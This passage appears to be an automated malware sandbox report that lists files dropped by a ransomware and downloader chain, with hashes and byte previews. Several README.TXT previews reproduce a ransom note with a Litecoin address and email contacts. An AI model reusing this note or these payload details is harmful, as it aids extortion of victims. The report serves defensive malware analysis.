                                                                                                                                                                                                                                                Entropy (8bit):4.985718904287246
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:qnsgBZsH/QRFocJAU7PPNaJ1b+JzzaUnK2hEyXV6:WsHuFHGQPo1b+Jva2bKn
                                                                                                                                                                                                                                                MD5:EB6D51420CA68FD250C7C81BC2839701
                                                                                                                                                                                                                                                SHA1:C5E74CFD7105CCD88A7BDFE8B3406398D9F5F3B5
                                                                                                                                                                                                                                                SHA-256:2DD3D6030C8E523A9A1B5E7E1E6262F6D7F736E75BDACAD57BA534E50DBBBABA
                                                                                                                                                                                                                                                SHA-512:0EEB01C9A0DA36DDF1ADC93C835DEFF148C11E50ECD6DC8269E206A8C3CFF413D02CAE533D07CB025C5FF396063463898DDA7735E369849469D80E218DD5DFC0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.($+t.r_.....I.`t......O..X.Q.]?k?..U[...T<`...l...,...|..-.Py.[..{....@.WO.....j...v.......%.....qG.G.....H..a..b.._.,CdY".Hn...uv'...<..!...$s...Cx.y........^....._......9.J............&..bw#..to..!...g.....C..!.O...Q..0.....T..#!.Q..[.k.."'...q..'.S'_...j..~..-.N).Z.?]...H...P.k..N.......{+.....:[....Q...)...1.3.*..{]37.q]....E.F6...m....!.a..3#.+?O/.N..D6-.oJ...yP.h..F.L......Cf......:.Z..i.m..YLC..>.3..7.P'.A9....q...V...N.3Z~.6.q..[.#d.WPV.(..5...e....b..Q...J.....q_V=q...Z...EPRn...Fs6v..6. .x?..<|.'.X[*.~$.....#.0J. ...i..:v1.%.Qo.J.!5..j.V].4..a..dyp.j.k....!q.s....Z.5..`|3y...K..T.`...)L...o...2.p....%3@.C...A.#Vw.b................%..A5s....0.^;1....@.)q....D..$....09.F...z..)|u`.<..lf.U......s. ..p+;...Mc.>.T....^...8...V..'>H.&.j. ..!..,.d.l.}..M.cC..4..#........F.B...cW|.5.......D.V./...........j ....B...g.B`h..J...x.;.D..%5..l)^..S.6Q....$.......i..b}P..B.D..q.N. .-....`.'.j@a.4....y........(/.w.2KlA...TR-......

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):524896
                                                                                                                                                                                                                                                Entropy (8bit):4.985718904287246
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:qnsgBZsH/QRFocJAU7PPNaJ1b+JzzaUnK2hEyXV6:WsHuFHGQPo1b+Jva2bKn
                                                                                                                                                                                                                                                MD5:EB6D51420CA68FD250C7C81BC2839701
                                                                                                                                                                                                                                                SHA1:C5E74CFD7105CCD88A7BDFE8B3406398D9F5F3B5
                                                                                                                                                                                                                                                SHA-256:2DD3D6030C8E523A9A1B5E7E1E6262F6D7F736E75BDACAD57BA534E50DBBBABA
                                                                                                                                                                                                                                                SHA-512:0EEB01C9A0DA36DDF1ADC93C835DEFF148C11E50ECD6DC8269E206A8C3CFF413D02CAE533D07CB025C5FF396063463898DDA7735E369849469D80E218DD5DFC0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.($+t.r_.....I.`t......O..X.Q.]?k?..U[...T<`...l...,...|..-.Py.[..{....@.WO.....j...v.......%.....qG.G.....H..a..b.._.,CdY".Hn...uv'...<..!...$s...Cx.y........^....._......9.J............&..bw#..to..!...g.....C..!.O...Q..0.....T..#!.Q..[.k.."'...q..'.S'_...j..~..-.N).Z.?]...H...P.k..N.......{+.....:[....Q...)...1.3.*..{]37.q]....E.F6...m....!.a..3#.+?O/.N..D6-.oJ...yP.h..F.L......Cf......:.Z..i.m..YLC..>.3..7.P'.A9....q...V...N.3Z~.6.q..[.#d.WPV.(..5...e....b..Q...J.....q_V=q...Z...EPRn...Fs6v..6. .x?..<|.'.X[*.~$.....#.0J. ...i..:v1.%.Qo.J.!5..j.V].4..a..dyp.j.k....!q.s....Z.5..`|3y...K..T.`...)L...o...2.p....%3@.C...A.#Vw.b................%..A5s....0.^;1....@.)q....D..$....09.F...z..)|u`.<..lf.U......s. ..p+;...Mc.>.T....^...8...V..'>H.&.j. ..!..,.d.l.}..M.cC..4..#........F.B...cW|.5.......D.V./...........j ....B...g.B`h..J...x.;.D..%5..l)^..S.6Q....$.......i..b}P..B.D..q.N. .-....`.'.j@a.4....y........(/.w.2KlA...TR-......

                                                                                                                                                                                                                                                C:\Users\user\.curlrc

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):616
                                                                                                                                                                                                                                                Entropy (8bit):7.6186209788621415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZTbHmPku:SjmJrc0YXUZtwsTP7A
                                                                                                                                                                                                                                                MD5:FD3A9290861A13EBA3BB317300025B3A
                                                                                                                                                                                                                                                SHA1:9D6EF672A19DB964053255EE12839F75634B2B01
                                                                                                                                                                                                                                                SHA-256:7A0FC4971C0865282A0EAB7BE9B33845E4FB6D0531CBD53AA1318DC4D01B907B
                                                                                                                                                                                                                                                SHA-512:464C39A69B55A898B0B0E6E43B15D0F92A85A9DD83B8E2868F19047661B4CC3A6C48D0353F85EF92312F6C53D5899C557965905D2B97295453A543198ABF649D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.."...#..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.p..m.....M\/...Lb#|..K....T.y......................fk.W...f

                                                                                                                                                                                                                                                C:\Users\user\.curlrc.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):616
                                                                                                                                                                                                                                                Entropy (8bit):7.6186209788621415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZTbHmPku:SjmJrc0YXUZtwsTP7A
                                                                                                                                                                                                                                                MD5:FD3A9290861A13EBA3BB317300025B3A
                                                                                                                                                                                                                                                SHA1:9D6EF672A19DB964053255EE12839F75634B2B01
                                                                                                                                                                                                                                                SHA-256:7A0FC4971C0865282A0EAB7BE9B33845E4FB6D0531CBD53AA1318DC4D01B907B
                                                                                                                                                                                                                                                SHA-512:464C39A69B55A898B0B0E6E43B15D0F92A85A9DD83B8E2868F19047661B4CC3A6C48D0353F85EF92312F6C53D5899C557965905D2B97295453A543198ABF649D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.."...#..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.p..m.....M\/...Lb#|..K....T.y......................fk.W...f

                                                                                                                                                                                                                                                C:\Users\user\.ms-ad\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\3D Objects\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fa1ce2a324.exe.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe
                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):226
                                                                                                                                                                                                                                                Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):393728
                                                                                                                                                                                                                                                Entropy (8bit):6.004737079894222
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
                                                                                                                                                                                                                                                MD5:DFD5F78A711FA92337010ECC028470B4
                                                                                                                                                                                                                                                SHA1:1A389091178F2BE8CE486CD860DE16263F8E902E
                                                                                                                                                                                                                                                SHA-256:DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
                                                                                                                                                                                                                                                SHA-512:A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2817536
                                                                                                                                                                                                                                                Entropy (8bit):6.519620161804985
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:VXbwLbKzVefYyGW0OAPEFT/gREK9COioEzSKD:5bwLbKzVNyGW0bEJIRn8uKD
                                                                                                                                                                                                                                                MD5:B0B3FC8A43169DD5D7E252EF410E48B5
                                                                                                                                                                                                                                                SHA1:ECB35C0F2C89E093006C341001D31FD53E9C9986
                                                                                                                                                                                                                                                SHA-256:3324A620600AAC9B552C5AF9022A1FA755ADF355DA9CA79EDA97E40B7E44F10B
                                                                                                                                                                                                                                                SHA-512:EC6B8B13539A404F20DD5B0210CEE45240CFA68146332485B45253C66CA900C431DA848E2A9D5A43BB65969F71663D75FE87D8C8D8C6116FF9E747B339563EEA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+.......+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qufopntd..*.......*..:..............@...phedmodh. ...@+.......*.............@....taggant.@...`+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):97296
                                                                                                                                                                                                                                                Entropy (8bit):7.9982317718947025
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                                                                                                                                                                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                                                                                                                                                                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                                                                                                                                                                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                                                                                                                                                                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                Entropy (8bit):5.384610804014705
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:SfNaoQRwWTEQRlYfNaoQ8crtrYQ8crLfNaoQnQKQhwfNaoQjE0UrU0U8Q2:6NnQRwWTEQRlkNnQ8WBYQ8WjNnQtQaNd
                                                                                                                                                                                                                                                MD5:358F2694D79197E7A50B8B140599C578
                                                                                                                                                                                                                                                SHA1:AC3FB110068AA5F37AC0E7F34A4EF8FE374BBEF5
                                                                                                                                                                                                                                                SHA-256:8A175DDC588B4B50EC14FCEF6678B231472968CC5D512F117F5872F81DFA6823
                                                                                                                                                                                                                                                SHA-512:4D086C85483DE7AF1D72C707F90B1C7971FA983242065646978A7BF18111657E2B0F5DDD90893CC04812714DFD44B619B27EFCCF95968C13DAAB7F486CAECA43
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/10AD81002110F43A388B6479228A688B",.. "id": "10AD81002110F43A388B6479228A688B",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/10AD81002110F43A388B6479228A688B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/5C41F46B382FF8FBD38665414B28ADAE",.. "id": "5C41F46B382FF8FBD38665414B28ADAE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/5C41F46B382FF8FBD38665414B28ADAE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):964608
                                                                                                                                                                                                                                                Entropy (8bit):6.690565315413207
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8al2Zx:STvC/MTQYxsWR7al2
                                                                                                                                                                                                                                                MD5:D314453DBA24064A56B135AEB166CDDA
                                                                                                                                                                                                                                                SHA1:7BD741B3EAC3CF5C17E50957F6AE79202921F5C8
                                                                                                                                                                                                                                                SHA-256:FF33ED675DE449450940132FA1033C7174BC3DF9D1D4A226905F3C8709634C04
                                                                                                                                                                                                                                                SHA-512:DB05274CFEEF8149FB9B937C2A90019201BD0D76C507CD2559D4D8AC9A907C4AF8217AC371A9C71096052AE9AF07741CF77C43FF181157304EEF4D67AABE217F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r'\g..........".................w.............@......................................@...@.......@.....................d...|....@...L.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....L...@...N..................@..@.reloc...u.......v...B..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1968640
                                                                                                                                                                                                                                                Entropy (8bit):7.9330340654828095
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:uv8V2T+34LyPayMriAtDEMH6a62D6WEDKrH:9VYfyiZ79t6WEa
                                                                                                                                                                                                                                                MD5:C371507551999618FA1DCEB764333BC0
                                                                                                                                                                                                                                                SHA1:E71870305AD13FEF36B85E5A3CD8E038525F994C
                                                                                                                                                                                                                                                SHA-256:0FB1F2F159E36668C4480491AE8B05FE3F8FD28BEEB933D46CF10BA3343256B6
                                                                                                                                                                                                                                                SHA-512:758E15B5EDC9DB3D060F52A6F0B8CAF07A03523905AD15D4A944B9C2C025545C4B498B22C2AD92A9781235E7A450C2608E40FFFD98F1F764334D02CF3B2F243E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@.................................J8......................................Z.B.n.....@.h!..................................................x....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... .`).. B.....................@...awzrkizh......k.....................@...dziymjtb.....p......................@....taggant.0......."..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4ZD5C3i[1].exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1177600
                                                                                                                                                                                                                                                Entropy (8bit):6.818135641587018
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:oV8u1dJPHRQTAVWpiUHeAHLnVUcatjj/KP/2kq/967kI:oNFRbMHLycKTKP/2kW67kI
